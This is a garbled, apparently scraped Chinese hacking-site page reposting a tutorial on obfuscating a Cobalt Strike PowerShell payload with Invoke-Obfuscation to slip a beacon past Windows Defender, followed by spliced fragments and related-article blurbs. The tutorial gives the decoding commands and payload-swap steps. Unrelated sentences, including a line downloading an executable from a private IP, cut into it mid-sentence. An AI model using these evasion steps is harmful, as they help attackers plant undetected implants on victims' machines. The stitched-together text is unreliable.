ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

访客4年前黑客文章360

在浸透测验中,红方选手想在不触发任何警报、引起政策警惕的前提下成功开释侵犯载荷始终是一项十分赋有应战的使命。与其他安全解决方案相同,Windows Defender在检测Cobalt Strike等东西所生成的通用型侵犯载荷方面现已体现得越来越好。

在本文中,我们将通过Cobalt Strike生成一个PowerShell侵犯载荷,然后修正这个载荷,绕过Windows 10主机上设备的Windows Defender。尽管这并不是在Windows Defender眼皮底下躲藏侵犯载荷的更高雅或许最简略的 *** ,但通过我们的验证,该 *** 确实有用。

 

二、载荷创建及混杂

创建载荷的进程如下所示:

操作完结后,我们可以得到包括PowerShell指令的一个payload.txt

假如我们在政策PC上直接工作指令,那么Windows Defender会将这种行为标识为风险行为。

为了绕过Windows Defender,我们首要需求了解Cobalt Strike怎么发明侵犯载荷,然后再修正载荷的特征,期望这种 *** 能骗过Windows Defender。

清楚明了的是,这段载荷指令通过base64编码,我们可以调查数据格式或许其间的-encodedcommand这个PowerShell标志来承认这一点。

为了解码这个指令,我们需求删去其间的powershell.exe -nop -w hidden -encodedcommand字符串,保存剩下的字符串,然后运用如下指令完结解码:

echo 'base64 payload' | base64 -d

解码出来的字符串仍然包括base64编码的字符串,但假如选用相同 *** 进行解码则会生成乱码。依据PowerShell指令中的IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()句子,我们可以知道这段字符串通过Gzip紧缩处理过。

现在我们需求了解这段数据中的真实内容,由于正是这段数据(即载荷)触发了Windows Defender的警报。运用Google一番搜索后,我发现这段PowerShell脚本的功用与http://chernodv.blogspot.com.cy/2014/12/powershell-compression-decompression.html脚本的功用彻底一致。

$data = [System.Convert]::FromBase64String('gzip base64')$ms = New-Object System.IO.MemoryStream$ms.Write($data, 0, $data.Length)$ms.Seek(0,0) | Out-Null$sr = New-Object S

◆丰盛的处理才干-每个记载都有标题,能被更好的辨认

ystem.IO.StreamReader(New-Obje通过跟踪研讨,Proof point 指出该途径会常常更改证书来使其在其用户设备上设备的运用程序合法化,以避免被苹果检测到。ct System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))$sr.ReadToEnd() | set-clipboard

这个脚本首要会运用base64算法解码字符串,然后解压所得成果,毕竟向我们出现完好的代码。代码还会将输出成果复制到剪贴板,便利我们粘贴到文本文件中,以便稍后运用。

$var_code变量保存的是详细的载荷,Windows Defender会检测到这个载荷,因此我们需求换掉这部分数据,绕过检测。

进一步解码$var_code后,我们发现这是一堆AS7、新增Windows Event日志 if (n == null) {工作条目CII字符,但此刻我们还不需求彻底解码这部分数据。

$enc=[System.Convert]::FromBase64String('encoded string')

我们可以运用如下指令读取其间部分内容:

$readString=[System.Text.Encoding]::ASCII.GetString($enc)

上面这部分数据可以奥秘我们一些信息,比方user agent字段以及我们所运用的IP地址。

现在我们的政策是处理当时的载荷,对其进行混杂处理,使其可以骗过Windows Defender。关于这个使命,更好的一个东西就是Daniel Bohannon所开发的Invoke-Obfuscation,我们可以参阅Github页面了解更多细节。

调用Invoke-Obfuscation的指令如下所示:

Import-Module .Invoke-Obfuscation.psd1Invoke-Obfuscation

现在我们需求指定待混杂的载荷数据,我们可以运用如下指令完结这一使命:

Set scriptblock 'final_base64payload'

这款东西可以处理我们供给的脚本代码数据,然后问询我们要怎么持续处理这段数据。在本文事例中,我选择的是COMPRESS以及子选项1。其他选项应该也可以试一下,但关于这个场景,我发现该 *** 确实卓有成效(到本文编撰时)。Invoke-Obfuscation可以担任大任,打印出一段比较紊乱的PowerShell指令,足以绕过Windows Defender。

接下来我们只需求输入Out指令以及待保存的PowerShell脚本的详细途径:

Out c:payload.ps1

之前操作进程中解压出来的载荷数据如下所示:

依据前文的分析,明显我们需求替换[Byte[]]$var_code = [System.Convert]::FromBase64String这部分内容,将其替换为Invoke-Obfuscation新创建的载荷。为了完结这个使命,我界说了一个新的变量$evil,用来保存Invoke-Obfuscation的输出成果。

重要提示:我们需求除掉Invoke-Obfuscation输出成果中|字现在,你将看到你的Kali Linux虚拟机和系统设置,我们现在需求做的就是点击“翻开此虚拟机电源”选项。符后边的数据,由于这是用来实行载荷数据的指令。我们不需求这条指令,由于Cobalt Strike模板会帮我们完结这个使命。

将修正后的脚本保存到PowerShell文件中然后加以实行。生成的成果可以作为Cobalt Strike中的beacon,假如我们运用的是@sec_groundzero开发的Aggressor Script,这就是其间的Slack告诉。

 

三、总结

假如我们运用Process Hacker来比照原始的CS载荷以及修正后的CS载荷,我们会发现修正操作并没有改动beacon的行为 *** ,并且成功规避了Windows Defender。

本文翻译自:www.offensiveops.io
如若转载,请注明出处:www.offensiveops.io

ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

#创建文件描述符,以可读()可写(>)的 *** 相关管道文件,这时候文件描述符3就有了有名管道文件的全部特性2. OD常用操作因此UEBA一个特征就是要能处理多个数据源的许多数据,这些数据源格式不同,速率也很快,后续的数据处理可以从结构化/非结构化提取有价值信息,数据处理是数据开掘和猜想分析领域的连续扩展,也是一门单独的学科:知识发现和数据开掘。数据源分为实时和离线,实时连续监测分析传入数据,一般不考虑历史数据和第三方数据相关,由于对功用有影响。Cobalt Strike:使用混淆技术绕过Windows Defender

ddos攻击‘appVersion’: ‘67.0.3396.87 (3396.87)’,实行”g”指令,能看到Bitmap回来的句柄被打印出来了满足CP的产品选择

1.单击EC2并创建新实例(EC2 == AWS Servers)。之后,选择Ubuntu Server 14.04 LTS。这时候转发一个80端口,协作hsf写入hook树立一个暂时的垂钓链接。Mimikatz有一个功用(dcsync),运用目录拷贝服务(DRS)从NTDS.DIT文件中检索暗码哈希值。该技术消除了直接从域控制器进行认证的必要性,由于它可以从域管理员环境中归于域的任意系统实行。因此,这也是一项用于红队的标准技术。KILLATTKddos攻击

视频中,3个iphone在12分钟内都被破解了。但很明显,iphone的暗码是被特别设置的,分别是0015,0016和0012,在破解设备上你可以设置破解暗码是从0000初步的。所以这样一来,能猜到0015也并不是那么困难了。假若你设定的是六位暗码,并且短时间内也没有改暗码,那这个小东西估计能跑十年左右。由于多一位暗码就会将遍历的时间增加10年。不知道怎样工作FuzzBunch的,请参阅我的上篇博文,操作 *** 和前次相同。TargetIP写靶机IP 202.X.X.X,CallBack写工作fb的IP,也就是172.26.97.35,不运用Redirection由于有UPX(3.91)版其他壳,这儿会发现运用官方的UPX –d 无法进行脱壳

打印言语是控制打印机作业的一个指令集,它奉告打印机怎样组织被打印的文档,在打印机言语的控制下,从计算机传来的打印数据被转化成可供打印的文字和图像,毕竟被打印机辨认并输出出来。打印言语抉择着激光打印机输出版面的凌乱程度,是衡量激光打印机功用的一个重要政策。 unsigned int mod = n % 4;Cobalt Strike:使用混淆技术绕过Windows Defender

ddos攻击备份 *** : }3. 翻开文件夹,成功运用

检查ip dns地址 如图所示,我们知道这是一个 C# 程序。 callbacks.setExtensionName("AES encrypt Java edition");//插件称谓 Linux:ddos攻击

#endifPost.Open "GET","http://192.168.174.145/ssss2.exe",0Cobalt Strike:使用混淆技术绕过Windows Defender

*** 电视,以及其他所谓的物联网设备,从出世它们的缝隙就一贯没断过。这次我们要介绍的是针对Vizio智能电视的中间人侵犯,它在与服务器验证HTTPS证书时是可以被绕过的。在第二轮消息流转中,该条消息将会与其他消息混编到一起,每台服务器都用只需自己知道的随机方式打乱一次该批消息的次第,然后将那些消息再乘以另一个随机数。当然解密和检索是很重要的,该进程逆序走一遍,当消息毕竟一遍流经各服务器,全部这些随机数都被除掉并被替换为该消息原有的密钥,这样收信人就可以解密并阅读消息了。下载地址:点击我


本文标题:ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

相关文章

贝拉米有机米粉怎么样

说到贝拉米,它最出名的就是有机了,贝拉米承诺不使用化学农药、化肥、合成激素、抗生素,无转基因物质。拥有澳洲双重有机认证,安全性很高。  ...

中韩黑客大战2017视频(韩国 黑客)

中韩黑客大战2017视频(韩国 黑客)

中美黑客大战是否真有其事? 中美黑客大战最终的结果是中国黑客手下留情,只改页面未破坏DoS。年美军误炸中国驻南使馆后,一大批网民开始思考要行动起来,大量只懂简单电脑知识的网民自学了一点黑客常识后便参与...

如何使用Airgeddon搭建基于软件的WIFI干扰器

如何使用Airgeddon搭建基于软件的WIFI干扰器

  Airgeddon是一款能够进行Wi-Fi干扰的多Bash网络审计工具,它可以允许你在未加入目标网络的情况下设置目标,并且断开目标网络中的所有设备。Airgeddon可以运行在Kali Lin...

雅虎新CEO致信员工:继续投资人才战略

中国北京时间7月21日信息,本周四,新就任的yahooCEO玛丽莎·梅耶尔(Marissa Mayer)向职工传出一份记事本,全文如下:   yahoo同事:   加盟代理yahoo,我倍...

花串串总部是哪里?先看一下它的发展前景

花串串总部是哪里?先看一下它的发展前景

火锅文化源远流长,从很早开始就受到了好多人的喜爱和关注,串串也是火锅文化发展的产物。随着人们生活的日益丰富多彩,串串店开遍了大街小巷。无论是白天还是晚上,串串店的生意火爆,店里热闹非凡。花串串在串串行...

找黑客网络价格(黑客网络攻略)

二楼的大哥,怎么每次都能见你答题,而且还全是一模一样的答案,我真佩服你啊楼主,不知道你年龄是否比我的大,说实话我也是个学生,不介意的话我就叫你。 黑客网络Hacknet你会玩了吗?小伙伴们是不是正在为...